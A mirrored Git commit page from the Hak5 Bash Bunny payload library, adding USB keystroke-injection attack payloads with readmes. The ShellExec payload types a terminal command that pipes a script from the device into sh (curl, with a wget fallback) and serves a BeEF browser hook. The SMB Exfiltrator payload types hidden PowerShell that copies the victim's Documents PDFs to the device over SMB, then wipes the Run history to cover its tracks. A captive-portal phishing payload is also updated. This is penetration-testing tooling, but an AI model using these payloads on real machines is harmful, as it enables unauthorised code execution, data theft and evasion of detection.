hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master'

pull/72/head
oXis 2017-03-23 20:03:57 +00:00
parent e60512e4a1 46e65e5eff
commit dc47035272
9 changed files with 259 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
payloads/library/Captiveportal/README.md
View File

@ -1,7 +1,7 @@
# Captive Portal for the Bash Bunny
Author: Sebkinne
Version: 1.0
Version: 1.1
## Description

11
payloads/library/Captiveportal/payload.txt
View File

@ -2,10 +2,7 @@
#
# Title: Captiveportal
# Author: Sebkinne
# Version: 1.0
# Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal
https://forums.hak5.org/index.php?/topic/40237-install-tools/
# Version: 1.1
# Add or remove inputs here
INPUTS=(username password)
@ -18,6 +15,9 @@ ATTACKMODE RNDIS_ETHERNET
# DO NOT EDIT BELOW THIS LINE #
##################################################################
source bunny_helpers.sh
WORKINGPATH="/root/udisk/payloads/$SWITCH_POSITION"
# Sets up iptable forwarding and filters
function setupNetworking() {
echo 1 > /proc/sys/net/ipv4/ip_forward
@ -30,8 +30,7 @@ function setupNetworking() {
# Find payload directory and execute payload
function startCaptiveportal() {
# cd $(dirname $(find /root/udisk/payloads/ -name portal.html))
cd /root/udisk/payloads/$SWITCH_POSITION
cd $WORKINGPATH
chmod +x captiveportal
./captiveportal ${INPUTS[@]}
}

6
payloads/library/ShellExec/evil.sh Normal file
View File

@ -0,0 +1,6 @@
!#/bin/bash
# opens browsers to the bunny's index.html page
[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1

1
payloads/library/ShellExec/hook.js Normal file
View File

@ -0,0 +1 @@
alert('This is where your evil JavaScript file would go')

12
payloads/library/ShellExec/index.html Normal file
View File

@ -0,0 +1,12 @@
<html>
<head>
<script type="text/javascript" src="http://172.16.64.1/hook.js"></script>
</head>
<body>
Nothing to see here!
</body>
</html>

54
payloads/library/ShellExec/payload.txt Normal file
View File

@ -0,0 +1,54 @@
#!/bin/bash
# Title: ShellExec
# Author: audibleblink
# Target: Mac/Linux
# Version: 1.0
#
# Create a web server on the BashBunny and forces
# the victim download and execute a script.
#
# White | Ready
# Ammber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED R G B
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
log_file=$payload_dir/shellexec.log
cd $payload_dir
# starting server
LED R G 500
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED B 500
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 100
Q ENTER
Q DELAY 2000
# Q ALT F2 # swap with block above for linux
# Q DELAY 100
Q STRING curl "http://$HOST_IP/evil.sh" \| sh
# in case curl isn't installed
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
Q ENTER
LED G

34
payloads/library/ShellExec/readme.md Normal file
View File

@ -0,0 +1,34 @@
# ShellExec
Author: audibleblink
Version: 1.0
## Description
Serves malicious scripts or web pages from the Bunny and forces
victims to curl and execute those scripts. Scripts can also force
browsers to open a url on the bunny to do things like serve BeEF
hooks.
## Configuration
evil.py - script that is fetched with DuckyScript
(provided script opens a web page that serves a BeEF hook )
hook.js - the aforementioned BeEF hook
index.html - BeEF hook delivery page
## Requirements
Just plug and play
## Status
| LED | Status |
| --------- | ----------- |
| White | Ready |
| Amber blinking | Waiting for server |
| Blue blinking | Attacking |
| Green | Finished |

115
payloads/library/smb_exfiltrator/payload.txt Normal file
View File

@ -0,0 +1,115 @@
#!/bin/bash
#
# Title: SMB Exfiltrator
# Author: Hak5Darren
# Version: 1.0
# Category: Exfiltration
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, Ethernet
#
#
# Red Blink Fast.......Impacket not found
# Red Blink Slow.......Target did not acquire IP address
# Amber Blink Fast.....Initialization
# Amber................HID Stage
# Purple Blink Fast....Ethernet Stage
# Blue Interstitial....Receiving Files
# White................Moving loot to mass storage
# Green................Finished
#
# OPTIONS
LOOTDIR=/root/udisk/loot/smb_exfiltrator
EXFILTRATE_FILES="*.pdf"
CLEARTRACKS="yes" # yes or no
# Initialization
LED R G 100
# Check for impacket. If not found, blink fast red.
if [ ! -d /pentest/impacket/ ]; then
LED R 100
exit 1
fi
# HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
# Once found, initiates file copy and exits
LED R G
ATTACKMODE HID
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
QUACK ENTER
# Clear tracks?
if [ $CLEARTRACKS == "yes" ]; then
QUACK DELAY 500
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER
fi
# ETHERNET STAGE
LED R B 100
ATTACKMODE RNDIS_ETHERNET
# Setup SMB server to receive loot in staging area
mkdir -p /root/loot/smb_exfiltrator/temp/
# house cleaning
rm -rf /root/loot/smb_exfiltrator/temp/*
# Fire up SMB Server
/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &
# Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh
# Give target a chance to start exfiltration
sleep 2
# Make loot directory based on hostname (increment for multiple uses)
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $LOOTDIR/$HOST-$COUNT
# Check target IP address. If unset, blink slow red.
if [ -z "${TARGET_IP}" ]; then
LED R 1000
exit 1
fi
# Wait until exfiltration is complete
last=0
current=1
while [ "$last" != "$current" ]; do
last=$current
current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1)
LED B
sleep 1
LED R B 100
sleep 9
# Files are still being copied. Loop.
# (Issue may exist if file takes longer than 10s to copy)
done
# Move files from staging area to loot directory
LED R G B
mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
sync; sleep 1; sync
# Trap is clean
LED G

31
payloads/library/smb_exfiltrator/readme.md Normal file
View File

@ -0,0 +1,31 @@
# SMB Exfiltrator
* Author: Hak5Darren
* Version: Version 1.0
* Target: Windows XP SP3+ (Powershell)
* Category: Exfiltration
* Attackmodes: HID, Ethernet
## Description
Exfiltrates select files from users's documents folder via SMB.
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-#
## Configuration
Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired.
## STATUS
| LED | Status |
| ------------------- | -------------------------------------- |
| Red (fast blink) | Impacket not found in /pentest |
| Red (slow blink) | Setup Failed. Target didn't obtain IP |
| Purple | HID Stage |
| Purple (fast blink) | Ethernet Stage |
| Blue (interupt) | Receiving files |
| White | Files received, moving to mass storage |
| Green | Finished |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread")